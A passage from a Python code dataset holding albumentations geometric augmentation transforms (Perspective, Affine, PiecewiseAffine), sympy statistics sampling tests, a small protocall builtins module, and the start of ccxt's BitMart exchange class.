self.approximate,\n self.same_dxdy,\n )\n\n def get_params(self):\n return {\"random_state\": random.randint(0, 10000)}\n\n def get_transform_init_args_names(self):\n return (\n \"alpha\",\n \"sigma\",\n \"alpha_affine\",\n \"interpolation\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n \"approximate\",\n \"same_dxdy\",\n )\n\n\nclass Perspective(DualTransform):\n \"\"\"Perform a random four point perspective transform of the input.\n\n Args:\n scale (float or (float, float)): standard deviation of the normal distributions. These are used to sample\n the random distances of the subimage's corners from the full image's corners.\n If scale is a single float value, the range will be (0, scale). Default: (0.05, 0.1).\n keep_size (bool): Whether to resize image’s back to their original size after applying the perspective\n transform. If set to False, the resulting images may end up having different shapes\n and will always be a list, never an array. Default: True\n pad_mode (OpenCV flag): OpenCV border mode.\n pad_val (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n Default: 0\n mask_pad_val (int, float, list of int, list of float): padding value for mask\n if border_mode is cv2.BORDER_CONSTANT. Default: 0\n fit_output (bool): If True, the image plane size and position will be adjusted to still capture\n the whole image after perspective transformation. 
(Followed by image resizing if keep_size is set to True.)\n Otherwise, parts of the transformed image may be outside of the image plane.\n This setting should not be set to True when using large scale values as it could lead to very large images.\n Default: False\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n scale=(0.05, 0.1),\n keep_size=True,\n pad_mode=cv2.BORDER_CONSTANT,\n pad_val=0,\n mask_pad_val=0,\n fit_output=False,\n interpolation=cv2.INTER_LINEAR,\n always_apply=False,\n p=0.5,\n ):\n super().__init__(always_apply, p)\n self.scale = to_tuple(scale, 0)\n self.keep_size = keep_size\n self.pad_mode = pad_mode\n self.pad_val = pad_val\n self.mask_pad_val = mask_pad_val\n self.fit_output = fit_output\n self.interpolation = interpolation\n\n def apply(self, img, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective(\n img, matrix, max_width, max_height, self.pad_val, self.pad_mode, self.keep_size, params[\"interpolation\"]\n )\n\n def apply_to_bbox(self, bbox, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective_bbox(bbox, params[\"rows\"], params[\"cols\"], matrix, max_width, max_height, self.keep_size)\n\n def apply_to_keypoint(self, keypoint, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective_keypoint(\n keypoint, params[\"rows\"], params[\"cols\"], matrix, max_width, max_height, self.keep_size\n )\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params):\n h, w = params[\"image\"].shape[:2]\n\n scale = np.random.uniform(*self.scale)\n points = np.random.normal(0, scale, [4, 2])\n points = np.mod(np.abs(points), 1)\n\n # top left -- no changes needed, just use jitter\n # top right\n points[1, 0] = 1.0 - points[1, 0] # w = 1.0 - jitter\n # bottom right\n points[2] = 1.0 - points[2] # w = 1.0 - jitt\n # bottom left\n points[3, 1] = 1.0 - points[3, 1] # h = 1.0 - jitter\n\n points[:, 0] *= w\n points[:, 1] *= h\n\n # Obtain a consistent order of the points and unpack them individually.\n # Warning: don't just do (tl, tr, br, bl) = _order_points(...)\n # here, because the reordered points is used further below.\n points = self._order_points(points)\n tl, tr, br, bl = points\n\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n min_width = None\n max_width = None\n while min_width is None or min_width < 2:\n width_top = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n width_bottom = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n max_width = int(max(width_top, width_bottom))\n min_width = int(min(width_top, width_bottom))\n if min_width < 2:\n step_size = (2 - min_width) / 2\n tl[0] -= step_size\n tr[0] += step_size\n bl[0] -= step_size\n br[0] += step_size\n\n # compute the height of the new image, which will be the maximum distance between the top-right\n # and bottom-right y-coordinates or the top-left and bottom-left y-coordinates\n min_height = None\n max_height = None\n while min_height is None or min_height < 2:\n height_right = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n height_left = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n max_height = int(max(height_right, height_left))\n min_height = int(min(height_right, 
height_left))\n if min_height < 2:\n step_size = (2 - min_height) / 2\n tl[1] -= step_size\n tr[1] -= step_size\n bl[1] += step_size\n br[1] += step_size\n\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left order\n # do not use width-1 or height-1 here, as for e.g. width=3, height=2\n # the bottom right coordinate is at (3.0, 2.0) and not (2.0, 1.0)\n dst = np.array([[0, 0], [max_width, 0], [max_width, max_height], [0, max_height]], dtype=np.float32)\n\n # compute the perspective transform matrix and then apply it\n m = cv2.getPerspectiveTransform(points, dst)\n\n if self.fit_output:\n m, max_width, max_height = self._expand_transform(m, (h, w))\n\n return {\"matrix\": m, \"max_height\": max_height, \"max_width\": max_width, \"interpolation\": self.interpolation}\n\n @classmethod\n def _expand_transform(cls, matrix, shape):\n height, width = shape\n # do not use width-1 or height-1 here, as for e.g. width=3, height=2, max_height\n # the bottom right coordinate is at (3.0, 2.0) and not (2.0, 1.0)\n rect = np.array([[0, 0], [width, 0], [width, height], [0, height]], dtype=np.float32)\n dst = cv2.perspectiveTransform(np.array([rect]), matrix)[0]\n\n # get min x, y over transformed 4 points\n # then modify target points by subtracting these minima => shift to (0, 0)\n dst -= dst.min(axis=0, keepdims=True)\n dst = np.around(dst, decimals=0)\n\n matrix_expanded = cv2.getPerspectiveTransform(rect, dst)\n max_width, max_height = dst.max(axis=0)\n return matrix_expanded, int(max_width), int(max_height)\n\n @staticmethod\n def _order_points(pts: np.ndarray) -> np.ndarray:\n pts = np.array(sorted(pts, key=lambda x: x[0]))\n left = pts[:2] # points with smallest x coordinate - left points\n right = pts[2:] # points with greatest x coordinate - right points\n\n if left[0][1] < left[1][1]:\n tl, bl = left\n else:\n bl, tl = left\n\n if right[0][1] < right[1][1]:\n tr, br = right\n else:\n br, tr = right\n\n return np.array([tl, tr, br, bl], dtype=np.float32)\n\n def get_transform_init_args_names(self):\n return (\"scale\", \"keep_size\", \"pad_mode\", \"pad_val\", \"mask_pad_val\", \"fit_output\", \"interpolation\")\n\n\nclass Affine(DualTransform):\n \"\"\"Augmentation to apply affine transformations to images.\n This is mostly a wrapper around the corresponding classes and functions in OpenCV.\n\n Affine transformations involve:\n\n - Translation (\"move\" image on the x-/y-axis)\n - Rotation\n - Scaling (\"zoom\" in/out)\n - Shear (move one side of the image, turning a square into a trapezoid)\n\n All such transformations can create \"new\" pixels in the image without a defined content, e.g.\n if the image is translated to the left, pixels are created on the right.\n A method has to be defined to deal with these pixel values.\n The parameters `cval` and `mode` of this class deal with this.\n\n Some transformations involve interpolations between several pixels\n of the input image to generate output pixel values. 
The parameters `interpolation` and\n `mask_interpolation` deals with the method of interpolation used for this.\n\n Args:\n scale (number, tuple of number or dict): Scaling factor to use, where ``1.0`` denotes \"no change\" and\n ``0.5`` is zoomed out to ``50`` percent of the original size.\n * If a single number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``.\n That value will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n translate_percent (None, number, tuple of number or dict): Translation as a fraction of the image height/width\n (x-translation, y-translation), where ``0`` denotes \"no change\"\n and ``0.5`` denotes \"half of the axis size\".\n * If ``None`` then equivalent to ``0.0`` unless `translate_px` has a value other than ``None``.\n * If a single number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``.\n That sampled fraction value will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n translate_px (None, int, tuple of int or dict): Translation in pixels.\n * If ``None`` then equivalent to ``0`` unless `translate_percent` has a value other than ``None``.\n * If a single int, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from\n the discrete interval ``[a..b]``. That number will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n rotate (number or tuple of number): Rotation in degrees (**NOT** radians), i.e. expected value range is\n around ``[-360, 360]``. Rotation happens around the *center* of the image,\n not the top left corner as in some other frameworks.\n * If a number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``\n and used as the rotation value.\n shear (number, tuple of number or dict): Shear in degrees (**NOT** radians), i.e. 
expected value range is\n around ``[-360, 360]``, with reasonable values being in the range of ``[-45, 45]``.\n * If a number, then that value will be used for all images as\n the shear on the x-axis (no shear on the y-axis will be done).\n * If a tuple ``(a, b)``, then two value will be uniformly sampled per image\n from the interval ``[a, b]`` and be used as the x- and y-shear value.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n interpolation (int): OpenCV interpolation flag.\n mask_interpolation (int): OpenCV interpolation flag.\n cval (number or sequence of number): The constant value to use when filling in newly created pixels.\n (E.g. translating by 1px to the right will create a new 1px-wide column of pixels\n on the left of the image).\n The value is only used when `mode=constant`. The expected value range is ``[0, 255]`` for ``uint8`` images.\n cval_mask (number or tuple of number): Same as cval but only for masks.\n mode (int): OpenCV border flag.\n fit_output (bool): Whether to modify the affine transformation so that the whole output image is always\n contained in the image plane (``True``) or accept parts of the image being outside\n the image plane (``False``). This can be thought of as first applying the affine transformation\n and then applying a second transformation to \"zoom in\" on the new image so that it fits the image plane,\n This is useful to avoid corners of the image being outside of the image plane after applying rotations.\n It will however negate translation and scaling.\n p (float): probability of applying the transform. 
Default: 0.5.\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n\n \"\"\"\n\n def __init__(\n self,\n scale: Optional[Union[float, Sequence[float], dict]] = None,\n translate_percent: Optional[Union[float, Sequence[float], dict]] = None,\n translate_px: Optional[Union[int, Sequence[int], dict]] = None,\n rotate: Optional[Union[float, Sequence[float]]] = None,\n shear: Optional[Union[float, Sequence[float], dict]] = None,\n interpolation: int = cv2.INTER_LINEAR,\n mask_interpolation: int = cv2.INTER_NEAREST,\n cval: Union[int, float, Sequence[int], Sequence[float]] = 0,\n cval_mask: Union[int, float, Sequence[int], Sequence[float]] = 0,\n mode: int = cv2.BORDER_CONSTANT,\n fit_output: bool = False,\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super().__init__(always_apply=always_apply, p=p)\n\n params = [scale, translate_percent, translate_px, rotate, shear]\n if all([p is None for p in params]):\n scale = {\"x\": (0.9, 1.1), \"y\": (0.9, 1.1)}\n translate_percent = {\"x\": (-0.1, 0.1), \"y\": (-0.1, 0.1)}\n rotate = (-15, 15)\n shear = {\"x\": (-10, 10), \"y\": (-10, 10)}\n else:\n scale = scale if scale is not None else 1.0\n rotate = rotate if rotate is not None else 0.0\n shear = shear if shear is not None else 0.0\n\n self.interpolation = interpolation\n self.mask_interpolation = mask_interpolation\n self.cval = cval\n self.cval_mask = cval_mask\n self.mode = mode\n self.scale = self._handle_dict_arg(scale, \"scale\")\n self.translate_percent, self.translate_px = self._handle_translate_arg(translate_px, translate_percent)\n self.rotate = to_tuple(rotate, rotate)\n self.fit_output = fit_output\n self.shear = self._handle_dict_arg(shear, \"shear\")\n\n def get_transform_init_args_names(self):\n return (\n \"interpolation\",\n \"mask_interpolation\",\n \"cval\",\n \"mode\",\n \"scale\",\n \"translate_percent\",\n \"translate_px\",\n \"rotate\",\n \"fit_output\",\n \"shear\",\n \"cval_mask\",\n )\n\n @staticmethod\n def _handle_dict_arg(val: Union[float, Sequence[float], dict], name: str):\n if isinstance(val, dict):\n if \"x\" not in val and \"y\" not in val:\n raise ValueError(\n f'Expected {name} dictionary to contain at least key \"x\" or ' 'key \"y\". 
Found neither of them.'\n )\n x = val.get(\"x\", 1.0)\n y = val.get(\"y\", 1.0)\n return {\"x\": to_tuple(x, x), \"y\": to_tuple(y, y)}\n return {\"x\": to_tuple(val, val), \"y\": to_tuple(val, val)}\n\n @classmethod\n def _handle_translate_arg(\n cls,\n translate_px: Optional[Union[float, Sequence[float], dict]],\n translate_percent: Optional[Union[float, Sequence[float], dict]],\n ):\n if translate_percent is None and translate_px is None:\n translate_px = 0\n\n if translate_percent is not None and translate_px is not None:\n raise ValueError(\n \"Expected either translate_percent or translate_px to be \" \"provided, \" \"but neither of them was.\"\n )\n\n if translate_percent is not None:\n # translate by percent\n return cls._handle_dict_arg(translate_percent, \"translate_percent\"), translate_px\n\n if translate_px is None:\n raise ValueError(\"translate_px is None.\")\n # translate by pixels\n return translate_percent, cls._handle_dict_arg(translate_px, \"translate_px\")\n\n def apply(\n self,\n img: np.ndarray,\n matrix: skimage.transform.ProjectiveTransform = None,\n output_shape: Sequence[int] = None,\n **params\n ) -> np.ndarray:\n return F.warp_affine(\n img,\n matrix,\n interpolation=self.interpolation,\n cval=self.cval,\n mode=self.mode,\n output_shape=output_shape,\n )\n\n def apply_to_mask(\n self,\n img: np.ndarray,\n matrix: skimage.transform.ProjectiveTransform = None,\n output_shape: Sequence[int] = None,\n **params\n ) -> np.ndarray:\n return F.warp_affine(\n img,\n matrix,\n interpolation=self.mask_interpolation,\n cval=self.cval_mask,\n mode=self.mode,\n output_shape=output_shape,\n )\n\n def apply_to_bbox(\n self,\n bbox: Sequence[float],\n matrix: skimage.transform.ProjectiveTransform = None,\n rows: int = 0,\n cols: int = 0,\n output_shape: Sequence[int] = (),\n **params\n ) -> Sequence[float]:\n return F.bbox_affine(bbox, matrix, rows, cols, output_shape)\n\n def apply_to_keypoint(\n self,\n keypoint: Sequence[float],\n matrix: skimage.transform.ProjectiveTransform = None,\n scale: dict = None,\n **params\n ) -> Sequence[float]:\n return F.keypoint_affine(keypoint, matrix=matrix, scale=scale)\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params: dict) -> dict:\n h, w = params[\"image\"].shape[:2]\n\n translate: Dict[str, Union[int, float]]\n if self.translate_px is not None:\n translate = {key: random.randint(*value) for key, value in self.translate_px.items()}\n elif self.translate_percent is not None:\n translate = {key: random.uniform(*value) for key, value in self.translate_percent.items()}\n translate[\"x\"] = translate[\"x\"] * w\n translate[\"y\"] = translate[\"y\"] * h\n else:\n translate = {\"x\": 0, \"y\": 0}\n\n shear = {key: random.uniform(*value) for key, value in self.shear.items()}\n scale = {key: random.uniform(*value) for key, value in self.scale.items()}\n rotate = random.uniform(*self.rotate)\n\n # for images we use additional shifts of (0.5, 0.5) as otherwise\n # we get an ugly black border for 90deg rotations\n shift_x = w / 2 - 0.5\n shift_y = h / 2 - 0.5\n\n matrix_to_topleft = skimage.transform.SimilarityTransform(translation=[-shift_x, -shift_y])\n matrix_shear_y_rot = skimage.transform.AffineTransform(rotation=-np.pi / 2)\n matrix_shear_y = skimage.transform.AffineTransform(shear=np.deg2rad(shear[\"y\"]))\n matrix_shear_y_rot_inv = skimage.transform.AffineTransform(rotation=np.pi / 2)\n matrix_transforms = skimage.transform.AffineTransform(\n scale=(scale[\"x\"], 
scale[\"y\"]),\n translation=(translate[\"x\"], translate[\"y\"]),\n rotation=np.deg2rad(rotate),\n shear=np.deg2rad(shear[\"x\"]),\n )\n matrix_to_center = skimage.transform.SimilarityTransform(translation=[shift_x, shift_y])\n matrix = (\n matrix_to_topleft\n + matrix_shear_y_rot\n + matrix_shear_y\n + matrix_shear_y_rot_inv\n + matrix_transforms\n + matrix_to_center\n )\n if self.fit_output:\n matrix, output_shape = self._compute_affine_warp_output_shape(matrix, params[\"image\"].shape)\n else:\n output_shape = params[\"image\"].shape\n\n return {\n \"rotate\": rotate,\n \"scale\": scale,\n \"matrix\": matrix,\n \"output_shape\": output_shape,\n }\n\n @staticmethod\n def _compute_affine_warp_output_shape(\n matrix: skimage.transform.ProjectiveTransform, input_shape: Sequence[int]\n ) -> Tuple[skimage.transform.ProjectiveTransform, Sequence[int]]:\n height, width = input_shape[:2]\n\n if height == 0 or width == 0:\n return matrix, input_shape\n\n # determine shape of output image\n corners = np.array([[0, 0], [0, height - 1], [width - 1, height - 1], [width - 1, 0]])\n corners = matrix(corners)\n minc = corners[:, 0].min()\n minr = corners[:, 1].min()\n maxc = corners[:, 0].max()\n maxr = corners[:, 1].max()\n out_height = maxr - minr + 1\n out_width = maxc - minc + 1\n if len(input_shape) == 3:\n output_shape = np.ceil((out_height, out_width, input_shape[2]))\n else:\n output_shape = np.ceil((out_height, out_width))\n output_shape_tuple = tuple([int(v) for v in output_shape.tolist()])\n # fit output image in new shape\n translation = (-minc, -minr)\n matrix_to_fit = skimage.transform.SimilarityTransform(translation=translation)\n matrix = matrix + matrix_to_fit\n return matrix, output_shape_tuple\n\n\nclass PiecewiseAffine(DualTransform):\n \"\"\"Apply affine transformations that differ between local neighbourhoods.\n This augmentation places a regular grid of points on an image and randomly moves the neighbourhood of these point\n around via affine transformations. This leads to local distortions.\n\n This is mostly a wrapper around scikit-image's ``PiecewiseAffine``.\n See also ``Affine`` for a similar technique.\n\n Note:\n This augmenter is very slow. Try to use ``ElasticTransformation`` instead, which is at least 10x faster.\n\n Note:\n For coordinate-based inputs (keypoints, bounding boxes, polygons, ...),\n this augmenter still has to perform an image-based augmentation,\n which will make it significantly slower and not fully correct for such inputs than other transforms.\n\n Args:\n scale (float, tuple of float): Each point on the regular grid is moved around via a normal distribution.\n This scale factor is equivalent to the normal distribution's sigma.\n Note that the jitter (how far each point is moved in which direction) is multiplied by the height/width of\n the image if ``absolute_scale=False`` (default), so this scale can be the same for different sized images.\n Recommended values are in the range ``0.01`` to ``0.05`` (weak to strong augmentations).\n * If a single ``float``, then that value will always be used as the scale.\n * If a tuple ``(a, b)`` of ``float`` s, then a random value will\n be uniformly sampled per image from the interval ``[a, b]``.\n nb_rows (int, tuple of int): Number of rows of points that the regular grid should have.\n Must be at least ``2``. 
For large images, you might want to pick a higher value than ``4``.\n You might have to then adjust scale to lower values.\n * If a single ``int``, then that value will always be used as the number of rows.\n * If a tuple ``(a, b)``, then a value from the discrete interval\n ``[a..b]`` will be uniformly sampled per image.\n nb_cols (int, tuple of int): Number of columns. Analogous to `nb_rows`.\n interpolation (int): The order of interpolation. The order has to be in the range 0-5:\n - 0: Nearest-neighbor\n - 1: Bi-linear (default)\n - 2: Bi-quadratic\n - 3: Bi-cubic\n - 4: Bi-quartic\n - 5: Bi-quintic\n mask_interpolation (int): same as interpolation but for mask.\n cval (number): The constant value to use when filling in newly created pixels.\n cval_mask (number): Same as cval but only for masks.\n mode (str): {'constant', 'edge', 'symmetric', 'reflect', 'wrap'}, optional\n Points outside the boundaries of the input are filled according\n to the given mode. Modes match the behaviour of `numpy.pad`.\n absolute_scale (bool): Take `scale` as an absolute value rather than a relative value.\n keypoints_threshold (float): Used as threshold in conversion from distance maps to keypoints.\n The search for keypoints works by searching for the\n argmin (non-inverted) or argmax (inverted) in each channel. This\n parameters contains the maximum (non-inverted) or minimum (inverted) value to accept in order to view a hit\n as a keypoint. Use ``None`` to use no min/max. Default: 0.01\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n\n \"\"\"\n\n def __init__(\n self,\n scale: Union[float, Sequence[float]] = (0.03, 0.05),\n nb_rows: Union[int, Sequence[int]] = 4,\n nb_cols: Union[int, Sequence[int]] = 4,\n interpolation: int = 1,\n mask_interpolation: int = 0,\n cval: int = 0,\n cval_mask: int = 0,\n mode: str = \"constant\",\n absolute_scale: bool = False,\n always_apply: bool = False,\n keypoints_threshold: float = 0.01,\n p: float = 0.5,\n ):\n super(PiecewiseAffine, self).__init__(always_apply, p)\n\n self.scale = to_tuple(scale, scale)\n self.nb_rows = to_tuple(nb_rows, nb_rows)\n self.nb_cols = to_tuple(nb_cols, nb_cols)\n self.interpolation = interpolation\n self.mask_interpolation = mask_interpolation\n self.cval = cval\n self.cval_mask = cval_mask\n self.mode = mode\n self.absolute_scale = absolute_scale\n self.keypoints_threshold = keypoints_threshold\n\n def get_transform_init_args_names(self):\n return (\n \"scale\",\n \"nb_rows\",\n \"nb_cols\",\n \"interpolation\",\n \"mask_interpolation\",\n \"cval\",\n \"cval_mask\",\n \"mode\",\n \"absolute_scale\",\n \"keypoints_threshold\",\n )\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params) -> dict:\n h, w = params[\"image\"].shape[:2]\n\n nb_rows = np.clip(random.randint(*self.nb_rows), 2, None)\n nb_cols = np.clip(random.randint(*self.nb_cols), 2, None)\n nb_cells = nb_cols * nb_rows\n scale = random.uniform(*self.scale)\n\n state = np.random.RandomState(random.randint(0, 1 << 31))\n jitter = state.normal(0, scale, (nb_cells, 2))\n if not np.any(jitter > 0):\n return {\"matrix\": None}\n\n y = np.linspace(0, h, nb_rows)\n x = np.linspace(0, w, nb_cols)\n\n # (H, W) and (H, W) for H=rows, W=cols\n xx_src, yy_src = np.meshgrid(x, y)\n\n # (1, HW, 2) => (HW, 2) for H=rows, W=cols\n points_src = np.dstack([yy_src.flat, xx_src.flat])[0]\n\n if self.absolute_scale:\n jitter[:, 0] = jitter[:, 0] / h if h > 0 else 0.0\n jitter[:, 1] = jitter[:, 1] / w if 
w > 0 else 0.0\n\n jitter[:, 0] = jitter[:, 0] * h\n jitter[:, 1] = jitter[:, 1] * w\n\n points_dest = np.copy(points_src)\n points_dest[:, 0] = points_dest[:, 0] + jitter[:, 0]\n points_dest[:, 1] = points_dest[:, 1] + jitter[:, 1]\n\n # Restrict all destination points to be inside the image plane.\n # This is necessary, as otherwise keypoints could be augmented\n # outside of the image plane and these would be replaced by\n # (-1, -1), which would not conform with the behaviour of the other augmenters.\n points_dest[:, 0] = np.clip(points_dest[:, 0], 0, h - 1)\n points_dest[:, 1] = np.clip(points_dest[:, 1], 0, w - 1)\n\n matrix = skimage.transform.PiecewiseAffineTransform()\n matrix.estimate(points_src[:, ::-1], points_dest[:, ::-1])\n\n return {\n \"matrix\": matrix,\n }\n\n def apply(\n self, img: np.ndarray, matrix: skimage.transform.PiecewiseAffineTransform = None, **params\n ) -> np.ndarray:\n return F.piecewise_affine(img, matrix, self.interpolation, self.mode, self.cval)\n\n def apply_to_mask(\n self, img: np.ndarray, matrix: skimage.transform.PiecewiseAffineTransform = None, **params\n ) -> np.ndarray:\n return F.piecewise_affine(img, matrix, self.mask_interpolation, self.mode, self.cval_mask)\n\n def apply_to_bbox(\n self,\n bbox: Sequence[float],\n rows: int = 0,\n cols: int = 0,\n matrix: skimage.transform.PiecewiseAffineTransform = None,\n **params\n ) -> Sequence[float]:\n return F.bbox_piecewise_affine(bbox, matrix, rows, cols, self.keypoints_threshold)\n\n def apply_to_keypoint(\n self,\n keypoint: Sequence[float],\n rows: int = 0,\n cols: int = 0,\n matrix: skimage.transform.PiecewiseAffineTransform = None,\n **params\n ):\n return F.keypoint_piecewise_affine(keypoint, matrix, rows, cols, self.keypoints_threshold)\n"} {"ext": "py", "sha": "1a312d2507aa36ff7f594066f5f8334771b8fc17", "content": "from sympy import S, Rational\nfrom sympy.external import import_module\nfrom sympy.stats import Binomial, sample, Die, FiniteRV, DiscreteUniform, Bernoulli, BetaBinomial, Hypergeometric, \\\n Rademacher\nfrom sympy.testing.pytest import skip, raises\n\ndef test_given_sample():\n X = Die('X', 6)\n scipy = import_module('scipy')\n if not scipy:\n skip('Scipy is not installed. Abort tests')\n assert sample(X, X > 5) == 6\n\ndef test_sample_numpy():\n distribs_numpy = [\n Binomial(\"B\", 5, 0.4),\n ]\n size = 3\n numpy = import_module('numpy')\n if not numpy:\n skip('Numpy is not installed. Abort tests for _sample_numpy.')\n else:\n for X in distribs_numpy:\n samps = sample(X, size=size, library='numpy')\n for sam in samps:\n assert sam in X.pspace.domain.set\n raises(NotImplementedError,\n lambda: sample(Die(\"D\"), library='numpy'))\n raises(NotImplementedError,\n lambda: Die(\"D\").pspace.sample(library='tensorflow'))\n\n\ndef test_sample_scipy():\n distribs_scipy = [\n FiniteRV('F', {1: S.Half, 2: Rational(1, 4), 3: Rational(1, 4)}),\n DiscreteUniform(\"Y\", list(range(5))),\n Die(\"D\"),\n Bernoulli(\"Be\", 0.3),\n Binomial(\"Bi\", 5, 0.4),\n BetaBinomial(\"Bb\", 2, 1, 1),\n Hypergeometric(\"H\", 1, 1, 1),\n Rademacher(\"R\")\n ]\n\n size = 3\n scipy = import_module('scipy')\n if not scipy:\n skip('Scipy not installed. 
Abort tests for _sample_scipy.')\n else:\n for X in distribs_scipy:\n samps = sample(X, size=size)\n samps2 = sample(X, size=(2, 2))\n for sam in samps:\n assert sam in X.pspace.domain.set\n for i in range(2):\n for j in range(2):\n assert samps2[i][j] in X.pspace.domain.set\n\n\ndef test_sample_pymc3():\n distribs_pymc3 = [\n Bernoulli('B', 0.2),\n Binomial('N', 5, 0.4)\n ]\n size = 3\n pymc3 = import_module('pymc3')\n if not pymc3:\n skip('PyMC3 is not installed. Abort tests for _sample_pymc3.')\n else:\n for X in distribs_pymc3:\n samps = sample(X, size=size, library='pymc3')\n for sam in samps:\n assert sam in X.pspace.domain.set\n raises(NotImplementedError,\n lambda: (sample(Die(\"D\"), library='pymc3')))\n\n\ndef test_sample_seed():\n F = FiniteRV('F', {1: S.Half, 2: Rational(1, 4), 3: Rational(1, 4)})\n size = 10\n libraries = ['scipy', 'numpy', 'pymc3']\n for lib in libraries:\n try:\n imported_lib = import_module(lib)\n if imported_lib:\n s0 = sample(F, size=size, library=lib, seed=0)\n s1 = sample(F, size=size, library=lib, seed=0)\n s2 = sample(F, size=size, library=lib, seed=1)\n assert all(s0 == s1)\n assert not all(s1 == s2)\n except NotImplementedError:\n continue\n"} {"ext": "py", "sha": "1a312d664f95be9471d53c006c172531cdd91ca1", "content": "# Copyright 2016 Google Inc. All Rights Reserved.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom protocall.proto import protocall_pb2\nfrom value import value\n\ndef print_(arguments, symbols):\n for arg in arguments:\n name = arg[0]\n atom = arg[1]\n print \"%s: %s\" % (name, value(atom))\n print\n return None\n\ndef double(arguments, symbols):\n arg = arguments[0]\n name = arg[0]\n atom = arg[1]\n \n a = protocall_pb2.Atom()\n a.literal.integer.value = atom.literal.integer.value * 2\n return a\n\ndef append(arguments, symbols):\n list_ = arguments[0]\n item = arguments[1]\n e = list_[1].literal.array.element.add()\n e.atom.CopyFrom(item[1])\n return e\n"} {"ext": "py", "sha": "1a312d8e7908a6ff686681158b2b3737cdb976c6", "content": "# -*- coding: utf-8 -*-\n\n# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:\n# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code\n\nfrom ccxt.base.exchange import Exchange\n\n# -----------------------------------------------------------------------------\n\ntry:\n basestring # Python 3\nexcept NameError:\n basestring = str # Python 2\nimport math\nfrom ccxt.base.errors import ExchangeError\nfrom ccxt.base.errors import AuthenticationError\nfrom ccxt.base.errors import PermissionDenied\nfrom ccxt.base.errors import AccountSuspended\nfrom ccxt.base.errors import ArgumentsRequired\nfrom ccxt.base.errors import BadRequest\nfrom ccxt.base.errors import BadSymbol\nfrom ccxt.base.errors import InsufficientFunds\nfrom ccxt.base.errors import InvalidAddress\nfrom ccxt.base.errors import InvalidOrder\nfrom ccxt.base.errors import OrderNotFound\nfrom ccxt.base.errors import NotSupported\nfrom ccxt.base.errors import RateLimitExceeded\nfrom ccxt.base.errors 
import ExchangeNotAvailable\nfrom ccxt.base.errors import InvalidNonce\nfrom ccxt.base.decimal_to_precision import ROUND\nfrom ccxt.base.decimal_to_precision import TRUNCATE\nfrom ccxt.base.decimal_to_precision import TICK_SIZE\n\n\nclass bitmart(Exchange):\n\n def describe(self):\n return self.deep_extend(super(bitmart, self).describe(), {\n 'id': 'bitmart',\n 'name': 'BitMart',\n 'countries': ['US', 'CN', 'HK', 'KR'],\n 'rateLimit': 250, # a bit slower than 50 times per second ~40 times per second\n 'version': 'v1',\n 'certified': True,\n 'pro': True,\n 'has': {\n 'cancelAllOrders': True,\n 'cancelOrder': True,\n 'cancelOrders': True,\n 'createOrder': True,\n 'fetchBalance': True,\n 'fetchCanceledOrders': True,\n 'fetchClosedOrders': True,\n 'fetchCurrencies': True,\n 'fetchDepositAddress': True,\n 'fetchDeposits': True,\n 'fetchFundingFee': True,\n 'fetchMarkets': True,\n 'fetchMyTrades': True,\n 'fetchOHLCV': True,\n 'fetchOpenOrders': True,\n 'fetchOrder': True,\n 'fetchOrderBook': True,\n 'fetchOrders': True,\n 'fetchOrderTrades': True,\n 'fetchStatus': True,\n 'fetchTicker': True,\n 